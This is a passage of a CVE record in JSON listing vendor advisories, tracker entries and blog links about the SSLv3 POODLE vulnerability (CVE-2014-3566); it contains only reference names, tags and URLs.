"http://secunia.com/advisories/60056" }, { "name": "RHSA-2014:1877", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1877.html" }, { "name": "HPSBUX03162", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141477196830952\u0026w=2" }, { "name": "61130", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61130" }, { "name": "RHSA-2015:1546", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-1546.html" }, { "name": "SUSE-SU-2015:0503", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00018.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/kb/HT6529" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.openssl.org/news/secadv_20141015.txt" }, { "name": "APPLE-SA-2014-10-16-3", "tags": [ "vendor-advisory", "x_refsource_APPLE", "x_transferred" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0" }, { "name": "RHSA-2014:1920", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1920.html" }, { "name": "1031087", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031087" }, { "name": "HPSBMU03234", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143628269912142\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05157667" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://bto.bluecoat.com/security-advisory/sa83" }, { "name": "SSRT101849", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141879378918327\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://support.citrix.com/article/CTX200238" }, { "name": "61359", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61359" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/kb/HT6541" }, { "name": "1031093", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031093" }, { "name": "1031132", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031132" }, { "name": "DSA-3144", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "http://www.debian.org/security/2015/dsa-3144" }, { "name": "SSRT101790", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721887231400\u0026w=2" }, { "name": "DSA-3253", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "http://www.debian.org/security/2015/dsa-3253" }, { "name": "SSRT101846", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04779034" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.suse.com/support/kb/doc.php?id=7015773" }, { "name": "APPLE-SA-2014-10-16-4", "tags": [ "vendor-advisory", "x_refsource_APPLE", "x_transferred" ], "url": "http://www.securityfocus.com/archive/1/533724/100/0/threaded" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.elastic.co/blog/logstash-1-4-3-released" }, { "name": "SSRT101854", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142296755107581\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05301946" }, { "name": "HPSBST03195", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142805027510172\u0026w=2" }, { "name": "61827", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61827" }, { "name": "HPSBMU03152", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141450452204552\u0026w=2" }, { "name": "RHSA-2015:0079", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0079.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21688283" }, { "name": "HPSBMU03304", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://technet.microsoft.com/library/security/3009008.aspx" }, { "name": "RHSA-2015:1545", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-1545.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21688165" }, { "name": "HPSBMU03259", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067\u0026w=2" }, { "name": "1031094", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031094" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.vmware.com/security/advisories/VMSA-2015-0003.html" }, { "name": "61316", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61316" }, { "name": "GLSA-201606-11", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/201606-11" }, { "name": "RHSA-2014:1881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1881.html" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.imperialviolet.org/2014/10/14/poodle.html" }, { "name": "1031096", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031096" }, { "name": "HPSBHF03275", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721887231400\u0026w=2" }, { "name": "61810", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61810" }, { "name": "HPSBHF03293", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "name": "DSA-3053", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "http://www.debian.org/security/2014/dsa-3053" }, { "name": "HPSBGN03237", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142296755107581\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.lenovo.com/us/en/product_security/poodle" }, { "name": "1031107", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031107" }, { "name": "1031095", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031095" }, { "name": "HPSBMU03223", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290583027876\u0026w=2" }, { "name": "SUSE-SU-2014:1549", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00002.html" }, { "name": "HPSBGN03305", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142962817202793\u0026w=2" }, { "name": "HPSBUX03194", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143101048219218\u0026w=2" }, { "name": "SSRT101868", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "name": "1031091", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031091" }, { "name": "HPSBMU03260", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "name": "1031123", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031123" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://askubuntu.com/questions/537196/how-do-i-patch-workaround-sslv3-poodle-vulnerability-cve-2014-3566" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/HT205217" }, { "name": "1031092", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031092" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html" }, { "name": "SUSE-SU-2015:0376", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00033.html" }, { "name": "61926", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61926" }, { "name": "RHSA-2014:1876", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1876.html" }, { "name": "SSRT101779", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142103967620673\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-3566.html" }, { "name": "HPSBHF03156", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141450973807288\u0026w=2" }, { "name": "openSUSE-SU-2016:0640", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://docs.ipswitch.com/MOVEit/DMZ82/ReleaseNotes/MOVEitReleaseNotes82.pdf" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "name": "SSRT101838", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141814011518700\u0026w=2" }, { "name": "HPSBGN03569", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=145983526810210\u0026w=2" }, { "name": "APPLE-SA-2015-09-16-2", "tags": [ "vendor-advisory", "x_refsource_APPLE", "x_transferred" ], "url": "http://lists.apple.com/archives/security-announce/2015/Sep/msg00002.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1076983" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/kb/HT6531" }, { "name": "SUSE-SU-2014:1357", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip" }, { "name": "RHSA-2015:0264", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0264.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10091" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/kb/HT6527" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "name": "SSRT101897", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350196615714\u0026w=2" }, { "name": "HPSBGN03203", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141697676231104\u0026w=2" }, { "name": "60206", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/60206" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1152789" }, { "name": "60792", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/60792" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "name": "APPLE-SA-2014-10-16-1", "tags": [ "vendor-advisory", "x_refsource_APPLE", "x_transferred" ], "url": "http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html" }, { "name": "DSA-3489", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "http://www.debian.org/security/2016/dsa-3489" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20141015-0001/" }, { "name": "1031105", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031105" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html" }, { "name": "FEDORA-2014-13069", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141114.html" }, { "name": "1031131", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031131" }, { "name": "HPSBMU03221", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141879378918327\u0026w=2" }, { "name": "USN-2487-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "http://www.ubuntu.com/usn/USN-2487-1" }, { "name": "SSRT101795", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142740155824959\u0026w=2" }, { "name": "HPSBGN03222", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141813976718456\u0026w=2" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.dfranke.us/posts/2014-10-14-how-poodle-happened.html" }, { "name": "1031130", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031130" }, { "name": "HPSBMU03301", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142721830231196\u0026w=2" }, { "name": "HPSBGN03164", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141577350823734\u0026w=2" }, { "name": "RHSA-2014:1948", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1948.html" }, { "name": "NetBSD-SA2014-015", "tags": [ "vendor-advisory", "x_refsource_NETBSD", "x_transferred" ], "url": "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.asc" }, { "name": "HPSBGN03192", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141620103726640\u0026w=2" }, { "name": "RHSA-2014:1653", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1653.html" }, { "name": "SUSE-SU-2015:0392", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00036.html" }, { "name": "HPSBMU03416", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=144101915224472\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021431" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://support.apple.com/HT204244" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://blogs.technet.com/b/msrc/archive/2014/10/14/security-advisory-3009008-released.aspx" }, { "name": "HPSBMU03283", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624679706236\u0026w=2" }, { "name": "RHSA-2015:0085", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0085.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/kb/HT6536" }, { "name": "FEDORA-2014-12951", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-November/142330.html" }, { "name": "HPSBGN03191", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141576815022399\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://groups.google.com/forum/#%21topic/docker-user/oYm0i3xShJU" }, { "name": "SSRT101767", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141477196830952\u0026w=2" }, { "name": "SUSE-SU-2014:1526", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00021.html" }, { "name": "HPSBGN03332", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290371927178\u0026w=2" }, { "name": "RHSA-2014:1652", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1652.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/kb/HT6535" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02" }, { "name": "SUSE-SU-2015:0345", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00027.html" }, { "name": "HPSBST03265", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142546741516006\u0026w=2" }, { "name": "RHSA-2015:0086", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0086.html" }, { "name": "HPSBMU03241", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143039249603103\u0026w=2" }, { "name": "1031124", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031124" }, { "name": "SUSE-SU-2015:0578", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "name": "SUSE-SU-2015:0336", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00024.html" }, { "name": "RHSA-2015:0080", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0080.html" }, { "name": "HPSBMU03294", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142740155824959\u0026w=2" }, { "name": "RHSA-2014:1882", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1882.html" }, { "name": "RHSA-2015:0068", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0068.html" }, { "name": "HPSBGN03251", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142354438527235\u0026w=2" }, { "name": "USN-2486-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "http://www.ubuntu.com/usn/USN-2486-1" }, { "name": "HPSBGN03391", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=144294141001552\u0026w=2" }, { "name": "59627", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/59627" }, { "name": "HPSBGN03208", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141814011518700\u0026w=2" }, { "name": "SSRT101894", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "name": "HPSBMU03214", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141694355519663\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "name": "HPSBMU03263", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2" }, { "name": "HPSBGN03254", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350298616097\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.lenovo.com/product_security/poodle" }, { "name": "20141014 SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability", "tags": [ "vendor-advisory", "x_refsource_CISCO", "x_transferred" ], "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle" }, { "name": "HPSBGN03205", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141775427104070\u0026w=2" }, { "name": "RHSA-2015:0698", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2015-0698.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "name": "SUSE-SU-2014:1361", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://downloads.asterisk.org/pub/security/AST-2014-011.html" }, { "name": "60859", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/60859" }, { "name": "APPLE-SA-2014-10-20-2", "tags": [ "vendor-advisory", "x_refsource_APPLE", "x_transferred" ], "url": "http://www.securityfocus.com/archive/1/533746" }, { "name": "GLSA-201507-14", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/201507-14" }, { "name": "SSRT101921", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624719706349\u0026w=2" }, { "name": "SSRT101951", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142496355704097\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-405500.htm" }, { "name": "61345", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61345" }, { "name": "SSRT101834", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143101048219218\u0026w=2" }, { "name": "61019", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61019" }, { "name": "70574", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/70574" }, { "name": "1031120", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031120" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html" }, { "name": "61825", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61825" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://advisories.mageia.org/MGASA-2014-0416.html" }, { "name": "1031029", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031029" }, { "name": "HPSBUX03281", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04583581" }, { "name": "HPSBMU03262", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624719706349\u0026w=2" }, { "name": "HPSBMU03267", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05068681" }, { "name": "HPSBMU03261", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2" }, { "name": "SUSE-SU-2016:1459", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00000.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10104" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10705" }, { "name": "61782", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/61782" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://access.redhat.com/articles/1232123" }, { "name": "MDVSA-2015:062", "tags": [ "vendor-advisory", "x_refsource_MANDRIVA", "x_transferred" ], "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062" }, { "name": "FEDORA-2015-9110", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169361.html" }, { "name": "1031085", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": 